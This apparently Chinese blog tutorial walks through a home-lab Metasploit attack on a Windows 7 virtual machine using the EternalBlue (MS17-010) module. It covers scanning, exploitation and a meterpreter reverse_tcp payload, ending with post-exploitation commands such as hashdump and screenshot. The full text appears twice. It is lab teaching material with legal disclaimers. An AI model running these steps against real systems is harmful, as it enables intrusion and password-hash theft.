声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间
一、Metasploit(MSF)简介
Metasploit与2003年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁。
Metasploit主要包含以下几个模块:
1.辅助模块(Auxiliary): 主要用于渗透信息收集,提供了多种漏洞的详细信息
2.漏洞渗透模块(exploits): 也叫攻击模块,利用已知的安全漏洞对远程目标系统的漏洞进行攻击
3.攻击荷载模块(payload): 成功入侵计算机后运行的一段可执行的代码
4.后渗透模块(Post): 进一步收集被攻击的目标系统的各种信息
5.编码模块(encoders): 通过对payload进行各种编码来绕过一些防御系统或防御软件的检测
二、永恒之蓝简介
永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布,5月12日被不法分子改造成了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。
*SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
三、渗透攻击过程
*实验环境
虚拟机VMware15
攻击机:Kali_linux2020版 IP地址:192.168.122.134
靶机: windows7 x64 IP地址:192.168.122.132
*两台虚拟机均以NAT方式连接,win7以关闭防火墙,可以互相ping通
*tips:担心损伤虚拟机重新配置安装很麻烦的话记得给虚拟机拍个快照哦
IP地址展示:
win7防火墙已关闭
两台虚机机之间的ping测试
实战操作步骤
首先在kali中开启postgresql数据库(kali中默认自带)
service postgresql start //开启postgresql数据库
service postgresql status //查看postgresql数据库运行状态,Actice那一栏显示active则成功开启,如下图
此时可以按 q 键退出查看数据库状态
这里解释一下为什么要开启postgresql数据库,这是因为msf工具需要利用postgresql数据库记录渗透扫描结果和信息
然后初始化一下msfdb数据库,它提示我需要root权限,所以我这里切换了一下root权限
看到两个黄色的感叹号说明初始化成功
然后开启msf,直接输入命令
或者在左上角的应用程序中找到漏洞利用工具,效果是一样的
这个时候我们成功进入了msf并且看到了一些相关信息,例如我们的msf是5.0.87的版本
其中由2006个攻击模块,1096个辅助模块,343个后渗透模块,562个攻击荷载模块等等
然后我们检查一下数据库的状态,看到是已经成功连接
这里我们简单介绍一下模块信息的查看,已经了解的话可以跳过,例如你可以用show exploits命令查看exploits模块,因为模块太多,需要等待一会
我这里一共找到了两千多个exploits模块信息,他们的名命格式是 操作系统/服务/名称
例如这个第0条,记录的是aix操作系统下的localf服务的ibstat_path漏洞,disclosure表示它的发布时间,rank表示它的好用级别(manual一般,excellent优秀,good良好,average平均),最后的description是描述
然后我们继续渗透
首先搜索永恒之蓝模块
auxiliary表示辅助模块,exploit表示攻击模块,我们先用辅助模块对靶机进行目标收集,看其是否存在漏洞,这里快捷选择直接用use
然后我们用options查看参数,后面required表示是否需要设置,我们只需要设置yes的选项,但是可以看到,其中的端口(rport),进程(threads)等选项已经有默认值,我们这里只需要设置rhost(目标地址)
然后我们run,根据第一行回显信息可知,目标主机很可能存在ms17_010漏洞(永恒之蓝)
然后我们利用攻击模块对其展开攻击
可以看到,我们仍然只需要设置rhosts,然后我们run或者exploit都可以
但我们看到win时,我们就攻击成功了
这个时候我们直接进入了shell,可以看到我们已经拿下了win7系统的最高权限
我们也可以查看win7的IP地址,中文字符出现了乱码的话可能要在kali上调整一下编码方式,不过还是可以看到ipv4地址与虚拟机中的一致
至此,我们拿到了目标靶机的最高权限,后面的大家就可以自己玩了,如果还有什么疑惑,欢迎留言评论或私信
!还是那句话,大家自己搭靶机玩玩就行了,切勿用于非法用途
下面是一些补充内容
*MSF基本攻击流程
这里是附加信息,已经了解的可以跳过
1.扫描靶机,检测靶机上的漏洞,选择相应的模块,例如使用ms17_010进行攻击,use auxiliary/scanner/smb/smb_ms17_010
2.options检查并设置相应的参数,例如set rhosts 192.168.1.1
3.攻击靶机,run/exploit
4.选择payload,set payload windows/x64/meterpreter/reverse_tcp
5.攻击,run/exploit
*其他攻击命令
获取hash密码:meterpreter>hashdump
查看用户权限:meterpreter>getuid
获取屏幕截图:meterpreter>screenshot
获取shell:meterpreter>shell
参考资料
https://blog.csdn/qq_41453285/article/details/97040039
https://blog.csdn/wwl012345/article/details/89421881
感谢上述博主的优秀博文
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间
一、Metasploit(MSF)简介
Metasploit与2003年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁。
Metasploit主要包含以下几个模块:
1.辅助模块(Auxiliary): 主要用于渗透信息收集,提供了多种漏洞的详细信息
2.漏洞渗透模块(exploits): 也叫攻击模块,利用已知的安全漏洞对远程目标系统的漏洞进行攻击
3.攻击荷载模块(payload): 成功入侵计算机后运行的一段可执行的代码
4.后渗透模块(Post): 进一步收集被攻击的目标系统的各种信息
5.编码模块(encoders): 通过对payload进行各种编码来绕过一些防御系统或防御软件的检测
二、永恒之蓝简介
永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布,5月12日被不法分子改造成了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。
*SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
三、渗透攻击过程
*实验环境
虚拟机VMware15
攻击机:Kali_linux2020版 IP地址:192.168.122.134
靶机: windows7 x64 IP地址:192.168.122.132
*两台虚拟机均以NAT方式连接,win7以关闭防火墙,可以互相ping通
*tips:担心损伤虚拟机重新配置安装很麻烦的话记得给虚拟机拍个快照哦
IP地址展示:
win7防火墙已关闭
两台虚机机之间的ping测试
实战操作步骤
首先在kali中开启postgresql数据库(kali中默认自带)
service postgresql start //开启postgresql数据库
service postgresql status //查看postgresql数据库运行状态,Actice那一栏显示active则成功开启,如下图
此时可以按 q 键退出查看数据库状态
这里解释一下为什么要开启postgresql数据库,这是因为msf工具需要利用postgresql数据库记录渗透扫描结果和信息
然后初始化一下msfdb数据库,它提示我需要root权限,所以我这里切换了一下root权限
看到两个黄色的感叹号说明初始化成功
然后开启msf,直接输入命令
或者在左上角的应用程序中找到漏洞利用工具,效果是一样的
这个时候我们成功进入了msf并且看到了一些相关信息,例如我们的msf是5.0.87的版本
其中由2006个攻击模块,1096个辅助模块,343个后渗透模块,562个攻击荷载模块等等
然后我们检查一下数据库的状态,看到是已经成功连接
这里我们简单介绍一下模块信息的查看,已经了解的话可以跳过,例如你可以用show exploits命令查看exploits模块,因为模块太多,需要等待一会
我这里一共找到了两千多个exploits模块信息,他们的名命格式是 操作系统/服务/名称
例如这个第0条,记录的是aix操作系统下的localf服务的ibstat_path漏洞,disclosure表示它的发布时间,rank表示它的好用级别(manual一般,excellent优秀,good良好,average平均),最后的description是描述
然后我们继续渗透
首先搜索永恒之蓝模块
auxiliary表示辅助模块,exploit表示攻击模块,我们先用辅助模块对靶机进行目标收集,看其是否存在漏洞,这里快捷选择直接用use
然后我们用options查看参数,后面required表示是否需要设置,我们只需要设置yes的选项,但是可以看到,其中的端口(rport),进程(threads)等选项已经有默认值,我们这里只需要设置rhost(目标地址)
然后我们run,根据第一行回显信息可知,目标主机很可能存在ms17_010漏洞(永恒之蓝)
然后我们利用攻击模块对其展开攻击
可以看到,我们仍然只需要设置rhosts,然后我们run或者exploit都可以
但我们看到win时,我们就攻击成功了
这个时候我们直接进入了shell,可以看到我们已经拿下了win7系统的最高权限
我们也可以查看win7的IP地址,中文字符出现了乱码的话可能要在kali上调整一下编码方式,不过还是可以看到ipv4地址与虚拟机中的一致
至此,我们拿到了目标靶机的最高权限,后面的大家就可以自己玩了,如果还有什么疑惑,欢迎留言评论或私信
!还是那句话,大家自己搭靶机玩玩就行了,切勿用于非法用途
下面是一些补充内容
*MSF基本攻击流程
这里是附加信息,已经了解的可以跳过
1.扫描靶机,检测靶机上的漏洞,选择相应的模块,例如使用ms17_010进行攻击,use auxiliary/scanner/smb/smb_ms17_010
2.options检查并设置相应的参数,例如set rhosts 192.168.1.1
3.攻击靶机,run/exploit
4.选择payload,set payload windows/x64/meterpreter/reverse_tcp
5.攻击,run/exploit
*其他攻击命令
获取hash密码:meterpreter>hashdump
查看用户权限:meterpreter>getuid
获取屏幕截图:meterpreter>screenshot
获取shell:meterpreter>shell
参考资料
https://blog.csdn/qq_41453285/article/details/97040039
https://blog.csdn/wwl012345/article/details/89421881
感谢上述博主的优秀博文